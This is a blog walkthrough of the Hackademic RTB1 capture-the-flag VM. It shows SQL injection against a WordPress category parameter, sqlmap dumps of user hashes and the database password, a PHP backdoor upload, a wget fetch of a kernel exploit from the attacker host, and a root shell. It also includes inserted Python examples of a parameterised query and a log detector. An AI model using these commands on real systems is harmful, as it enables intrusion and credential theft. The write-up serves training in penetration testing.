Thursday, September 6, 2012

Hacking challenge RTB1

Hello Again.

A while back I started to research web app pentesting and managed to get through the DVWA Hackademic challenges, an excellent way to learn web app pentesting by the way.
I did not post a blog entry for that. Maybe I will do that later on.

I kind of felt that my skills in this area were getting rusty, so I got active again and took on another challenge: RTB1.
Root This Box version 1 is a VMware image of a Linux box running a web server with a backend database and applications.

I did not know what to expect, so I began to explore.

First, I set up the environment needed in VMware with host-only networking:
- RTB1
- My evil attack machine running BT5R2

I started off with SCANNING AND INFORMATION GATHERING, a really important step in the penetration testing process.
Since I know the host is on my local subnet, I do a simple ARP scan to find it.

root@bt:~# arp-scan -l
Interface: eth0, datalink type: EN10MB (Ethernet)
Starting arp-scan 1.6 with 256 hosts (http://www.nta-monitor.com/tools/arp-scan/)
192.168.140.133 00:0c:29:e1:16:bf VMware, Inc.



Wonderful, we have the IP address. Next...

PORTSCAN, WHAT IS IT RUNNING?

root@bt:~# nmap -v -n -P0 -sT 192.168.140.133
Starting Nmap 6.01 ( http://nmap.org ) at 2012-09-05 09:24 CEST
Initiating Connect Scan at 09:24
Scanning 192.168.140.133 [1000 ports]
Discovered open port 80/tcp on 192.168.140.133
Connect Scan Timing: About 42.90% done; ETC: 09:25 (0:00:41 remaining)
Completed Connect Scan at 09:25, 60.14s elapsed (1000 total ports)
Nmap scan report for 192.168.140.133
Host is up (0.92s latency).
Not shown: 998 filtered ports
PORT   STATE  SERVICE
22/tcp closed ssh
80/tcp open   http

Read data files from: /usr/local/bin/../share/nmap
Nmap done: 1 IP address (1 host up) scanned in 60.24 seconds


OK. A web server, how surprising :) Let's find out more.


BANNER GRABBING

root@bt:~# nc 192.168.140.133 80
HEAD / HTTP/1.0

HTTP/1.1 200 OK
Date: Wed, 05 Sep 2012 01:54:43 GMT
Server: Apache/2.2.15 (Fedora)
Last-Modified: Sun, 09 Jan 2011 17:22:11 GMT
ETag: "31cc-5c3-4996d177f5c3b"
Accept-Ranges: bytes
Content-Length: 1475
Connection: close
Content-Type: text/html; charset=UTF-8

OK. The banner says Apache 2.2.15 on Fedora.
Let's look at the web pages with a browser.


OK. Let's view the source of the page: http://192.168.140.133/Hackademic_RTB1/


It seems to be running WordPress 1.5.1.1.
I could now run a vulnerability scan and look for exploits for an automated attack, but I wanted to see if I could do something manually first.
Tempted as I am to start attacking, we are still gathering information. It is important to collect all the information before running any kind of attack, for best results.

More clicking. I clicked on the Uncategorized link and noticed the URL changed to
http://192.168.140.133/Hackademic_RTB1/?cat=1
Let's add a ' to the end of the URL, then try cat=0 and so on.



Oops, I found something: a MySQL backend :)
A table named wp_categories.
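As an added example (mine, not the original post's code), here is the shape of the bug behind that ?cat= parameter next to its fix. It uses a constructed SQLite stand-in for the 5-column wp_categories table the post enumerates; the column names are assumed, not taken from the post.

```python
import sqlite3

# Constructed stand-in for the 5-column wp_categories table the post enumerates
# with ORDER BY (column names assumed); SQLite replaces MySQL so it runs offline.
def setup_db():
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE wp_categories (cat_ID INTEGER, cat_name TEXT, "
               "category_nicename TEXT, category_description TEXT, category_parent INTEGER)")
    db.execute("INSERT INTO wp_categories VALUES (1, 'Uncategorized', 'uncategorized', '', 0)")
    return db

def vulnerable_lookup(db, cat):
    # Raw interpolation of ?cat=: whatever follows the number becomes part of the statement.
    sql = f"SELECT * FROM wp_categories WHERE cat_ID = {cat}"
    return db.execute(sql).fetchall()

def hardened_lookup(db, cat):
    # Reject anything that is not an integer, then bind the value as a parameter so it
    # can never change the statement's structure.
    cat_id = int(cat)
    return db.execute("SELECT * FROM wp_categories WHERE cat_ID = ?", (cat_id,)).fetchall()

def error_leaks(db, cat):
    # The post's first probe was a trailing quote: a syntax error reveals the backend.
    try:
        vulnerable_lookup(db, cat)
        return False
    except sqlite3.OperationalError:
        return True

PROBE = "0 UNION SELECT 1, sqlite_version(), 3, 4, 5"   # same shape as the post's union

def demo():
    db = setup_db()
    leaked = vulnerable_lookup(db, PROBE)      # column 2 now carries server data
    try:
        hardened_lookup(db, PROBE)
        blocked = False
    except ValueError:
        blocked = True
    return leaked, blocked
```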

Let's find out how the table is set up and how many columns it has. We can do this with the ORDER BY technique.

Added order by 1 to the end of the cat=0 statement.



Seems to have at least one column.
Added order by 2. Still OK.
Added order by 3. Still OK.
Added order by 4. Still OK.
Added order by 5. Still OK.
Added order by 6. Not OK any more.




OK. From this we know that the table has 5 columns.
Next, use a SQL UNION to find which column we can use to return the results of our own SQL.



Seems that column 2 is something we can use.
Let's find out the version of the MySQL database using version().





It is running MySQL 5.1.47.
More useful MySQL functions:
- database() returns "wordpress"
- user() returns "root@localhost"
- load_file() lets us see if we can read local files.




It did not work with the ASCII path /etc/hosts. Let's try with hex.
/etc/hosts converted to hex is 2f6574632f686f737473.



It works! We get the hosts file.
We can also read /etc/passwd to enumerate user accounts, and much more.
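From the defender's side, the probe sequence just walked through leaves a recognisable trail in the Apache access log. The following added example (mine, not the post's) runs simple signatures over constructed log lines modelled on the requests above: the quote test, ORDER BY enumeration, UNION SELECT and the hex-encoded load_file() read. The client IPs and timestamps are made up.

```python
import re
from urllib.parse import unquote_plus

# Constructed Apache access-log lines reproducing the probe sequence from the
# post (quote test, ORDER BY enumeration, UNION SELECT, hex-encoded load_file).
SAMPLE_LOG = """\
192.168.140.134 - - [05/Sep/2012:09:40:01 +0200] "GET /Hackademic_RTB1/?cat=1 HTTP/1.1" 200 5121
192.168.140.134 - - [05/Sep/2012:09:40:09 +0200] "GET /Hackademic_RTB1/?cat=1%27 HTTP/1.1" 200 4013
192.168.140.134 - - [05/Sep/2012:09:41:02 +0200] "GET /Hackademic_RTB1/?cat=0%20order%20by%201 HTTP/1.1" 200 4010
192.168.140.134 - - [05/Sep/2012:09:41:20 +0200] "GET /Hackademic_RTB1/?cat=0%20order%20by%206 HTTP/1.1" 200 4090
192.168.140.134 - - [05/Sep/2012:09:42:31 +0200] "GET /Hackademic_RTB1/?cat=0%20union%20select%201,version(),3,4,5 HTTP/1.1" 200 4101
192.168.140.134 - - [05/Sep/2012:09:45:12 +0200] "GET /Hackademic_RTB1/?cat=0%20union%20select%201,load_file(0x2f6574632f686f737473),3,4,5 HTTP/1.1" 200 4220
10.0.0.7 - - [05/Sep/2012:09:46:00 +0200] "GET /Hackademic_RTB1/?cat=1 HTTP/1.1" 200 5121
"""

LOG_RE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "(?P<method>\S+) (?P<path>\S+)')

# Each signature is (name, pattern) applied to the URL-decoded query string.
SIGNATURES = [
    ("quote_probe", re.compile(r"=\d+'")),
    ("orderby_enum", re.compile(r"\border\s+by\s+\d+", re.I)),
    ("union_select", re.compile(r"\bunion\s+(all\s+)?select\b", re.I)),
    ("file_read", re.compile(r"\bload_file\s*\(", re.I)),
    ("hex_literal", re.compile(r"\b0x[0-9a-f]{4,}", re.I)),
]

def classify(line):
    """Return (ip, [signature names]) for one access-log line, or None if unparseable."""
    m = LOG_RE.match(line)
    if not m:
        return None
    path = m.group("path")
    query = unquote_plus(path.partition("?")[2])   # decode %20, %27 etc. before matching
    hits = [name for name, pat in SIGNATURES if pat.search(query)]
    return m.group("ip"), hits

def scan(log_text):
    """Aggregate hits per client; a client tripping two or more distinct signatures is flagged."""
    per_ip = {}
    for line in log_text.splitlines():
        r = classify(line)
        if r is None:
            continue
        ip, hits = r
        per_ip.setdefault(ip, set()).update(hits)
    return {ip: sorted(sigs) for ip, sigs in per_ip.items() if len(sigs) >= 2}
```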


We can do a lot manually, but it is easier to use some tools.
Let's try sqlmap.

Let's get some tables:
./sqlmap.py -u http://192.168.140.133/Hackademic_RTB1/?cat=0 --tables
This command gives us all tables in all databases (wordpress, mysql and information_schema).
Very useful.


Let's extract the columns of the interesting table wp_users.
./sqlmap.py -u http://192.168.140.133/Hackademic_RTB1/?cat=1 -D "wordpress" -T wp_users --columns
Database: wordpress
Table: wp_users
[22 columns]
+---------------------+---------------------+
| Column              | Type                |
+---------------------+---------------------+
| ID                  | bigint(20) unsigned |
| user_activation_key | varchar(60)         |
| user_aim            | varchar(50)         |
| user_browser        | varchar(200)        |
| user_description    | longtext            |
| user_domain         | varchar(200)        |
| user_email          | varchar(100)        |
| user_firstname      | varchar(50)         |
| user_icq            | int(10) unsigned    |
| user_idmode         | varchar(20)         |
| user_ip             | varchar(15)         |
| user_lastname       | varchar(50)         |
| user_level          | int(2) unsigned     |
| user_login          | varchar(60)         |
| user_msn            | varchar(100)        |
| user_nicename       | varchar(50)         |
| user_nickname       | varchar(50)         |
| user_pass           | varchar(64)         |
| user_registered     | datetime            |
| user_status         | int(11)             |
| user_url            | varchar(100)        |
| user_yim            | varchar(50)         |
+---------------------+---------------------+


Now let's list all users and password hashes in the wp_users table.

./sqlmap.py -u http://192.168.140.133/Hackademic_RTB1/?cat=1 -D "wordpress" -T "wp_users" -C "user_firstname,user_lastname,user_level,user_login,user_pass" --dump
Database: wordpress
Table: wp_users
[6 entries]
+----------------------------------+--------------+------------+---------------+----------------+
| user_pass                        | user_login   | user_level | user_lastname | user_firstname |
+----------------------------------+--------------+------------+---------------+----------------+
| 21232f297a57a5a743894a0e4a801fc3 | NickJames    | 1          | James         | Nick           |
| 50484c19f1afdaf3841a0d821ed393d2 | MaxBucky     | 0          | Bucky         | Max            |
| 7cbb3252ba6b7e9c422fac5334d22054 | GeorgeMiller | 10         | Miller        | George         |
| 8601f6e1028a8e8a966f6c33fcd9aec4 | JasonKonnors | 0          | Konnors       | Jason          |
| a6e514f9486b83cb53d8d932f9a04292 | TonyBlack    | 0          | Black         | Tony           |
| b986448f0bb9e5e124ca91d3d650f52c | JohnSmith    | 0          | Smith         | John           |
+----------------------------------+--------------+------------+---------------+----------------+


We can go ahead and crack them as well.
Interesting to note that user_level might be the authorization level, so 10 could be the highest.






So now we have user accounts and their passwords, but we still do not have the root DBA password.

I know that the password is configured in some file on the system.
So Google is my friend.
I searched for "wordpress configuration file" and came up with the config filename wp-config.php.
But I do not know its location, yet.

The httpd.conf could be helpful.
After some trial and error and browsing the web for the default location, I tried:
./sqlmap.py -u http://192.168.140.133/Hackademic_RTB1/?cat=1 --file-read="/etc/httpd/conf/httpd.conf"
The file contained:
DocumentRoot "/var/www/html"


./sqlmap.py -u http://192.168.140.133/Hackademic_RTB1/?cat=1 --file-read="/var/www/html/Hackademic_RTB1/wp-config.php"
// ** MySQL settings ** //
define('DB_NAME', 'wordpress');     // The name of the database
define('DB_USER', 'root');     // Your MySQL username
define('DB_PASSWORD', 'lz5yedns'); // ...and password


So how do I log in?
I googled some more and found that the admin login interface is /wp-admin.





We cracked the passwords earlier, so let's log in with the user account with the highest user_level (GeorgeMiller)
and have a look around in the WordPress admin GUI.
I found that uploading was disabled. As an administrator I enabled uploading of PHP files.

Modified a PHP backdoor.




Started a shell listener and clicked on the uploaded special.php.



We have a shell!! It is running as the apache user.
Now we could upload Metasploit Meterpreter payloads for pivoting, but since the goal is to root the box we focus on that.
We could also start password guessing, using sucrack to crack the root password.

Let's see if the system is vulnerable first.

sh-4.0$ uname -a
Linux HackademicRTB1 2.6.31.5-127.fc12.i686 #1 SMP Sat Nov 7 21:41:45 EST 2009 i686 i686 i386 GNU/Linux


My best guess is to find a matching local privilege escalation exploit in exploitdb.
I found a few good candidate exploits,
so I started to compile and test them out.


9844,platforms/linux/local/9844.py,"Linux Kernel 2.4.1-2.4.37 and 2.6.1-2.6.32-rc5  Pipe.c Privelege Escalation",2009-11-05,"Matthew Bergin",linux,local,0
12130,platforms/linux/local/12130.py,"Linux Kernel <= 2.6.34-rc3 ReiserFS xattr Privilege Escalation",2010-04-09,"Jon Oberheide",linux,local,0
14814,platforms/linux/local/14814.c,"Linux Kernel < 2.6.36-rc1 CAN BCM Privilege Escalation Exploit",2010-08-27,"Jon Oberheide",linux,local,0
15704,platforms/linux/local/15704.c,"Linux Kernel <= 2.6.37 Local Privilege Escalation",2010-12-07,"Dan Rosenberg",linux,local,0
15774,platforms/linux/local/15774.c,"Linux Kernel < 2.6.37-rc2 ACPI custom_method Privilege Escalation",2010-12-18,"Jon Oberheide",linux,local,0
15285,platforms/linux/local/15285.c,"Linux RDS Protocol Local Privilege Escalation",2010-10-19,"Dan Rosenberg",linux,local,0


Compile and upload the exploit.

sh-4.0$ wget http://192.168.140.134/rtb1-rds
wget http://192.168.140.134/rtb1-rds
--2012-09-06 04:47:35--  http://192.168.140.134/rtb1-rds
Connecting to 192.168.140.134:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 12503 (12K) [text/plain]
Saving to: `rtb1-rds'

     0K .......... ..                                         100% 2.12M=0.006s
2012-09-06 04:47:35 (2.12 MB/s) - `rtb1-rds' saved [12503/12503]
sh-4.0$ ls -lsa
ls -lsa
total 60
 4 drwxrwxrwt  6 root   root    4096 Sep  6 04:47 .
 4 dr-xr-xr-x 22 root   root    4096 Sep  6 04:05 ..
 4 drwxrwxrwt  2 root   root    4096 Sep  6 04:05 .ICE-unix
 4 -r--r--r--  1 root   root      11 Sep  6 04:05 .X0-lock
 4 drwxrwxrwt  2 root   root    4096 Sep  6 04:05 .X11-unix
 4 drwx------  2 gdm    gdm     4096 Sep  6 04:05 orbit-gdm
 4 drwx------  2 gdm    gdm     4096 Sep  6 04:05 pulse-PKdhtXMmr18n
16 -rwxrwxrwx  1 apache apache 12474 Sep  6  2012 rtb1
16 -rw-rw-rw-  1 apache apache 12503 Sep  6  2012 rtb1-rds

sh-4.0$ chmod +x rtb1-rds

EXPLOIT

sh-4.0$ ./rtb1-rds
./rtb1-rds
[*] Linux kernel >= 2.6.30 RDS socket exploit
[*] by Dan Rosenberg
[*] Resolving kernel addresses...
 [+] Resolved security_ops to 0xc0aa19ac
 [+] Resolved default_security_ops to 0xc0955c6c
 [+] Resolved cap_ptrace_traceme to 0xc055d9d7
 [+] Resolved commit_creds to 0xc044e5f1
 [+] Resolved prepare_kernel_cred to 0xc044e452
[*] Overwriting security ops...
[*] Linux kernel >= 2.6.30 RDS socket exploit
[*] by Dan Rosenberg
[*] Resolving kernel addresses...
 [+] Resolved security_ops to 0xc0aa19ac
 [+] Resolved default_security_ops to 0xc0955c6c
 [+] Resolved cap_ptrace_traceme to 0xc055d9d7
 [+] Resolved commit_creds to 0xc044e5f1
 [+] Resolved prepare_kernel_cred to 0xc044e452
[*] Overwriting security ops...
[*] Overwriting function pointer...
[*] Linux kernel >= 2.6.30 RDS socket exploit
[*] by Dan Rosenberg
[*] Resolving kernel addresses...
 [+] Resolved security_ops to 0xc0aa19ac
 [+] Resolved default_security_ops to 0xc0955c6c
 [+] Resolved cap_ptrace_traceme to 0xc055d9d7
 [+] Resolved commit_creds to 0xc044e5f1
 [+] Resolved prepare_kernel_cred to 0xc044e452
[*] Overwriting security ops...
[*] Overwriting function pointer...
[*] Triggering payload...
[*] Restoring function pointer...

id
uid=0(root) gid=0(root)


YES! We got ROOT!
cd /root
ls
Desktop
anaconda-ks.cfg
key.txt
key.txt~
cat key.txt
Yeah!!
You must be proud because you 've got the password to complete the First *Realistic* Hackademic Challenge (Hackademic.RTB1) :)


Regards,
mr.pr0n || p0wnbox.Team || 2011


MISSION ACCOMPLISHED!!!



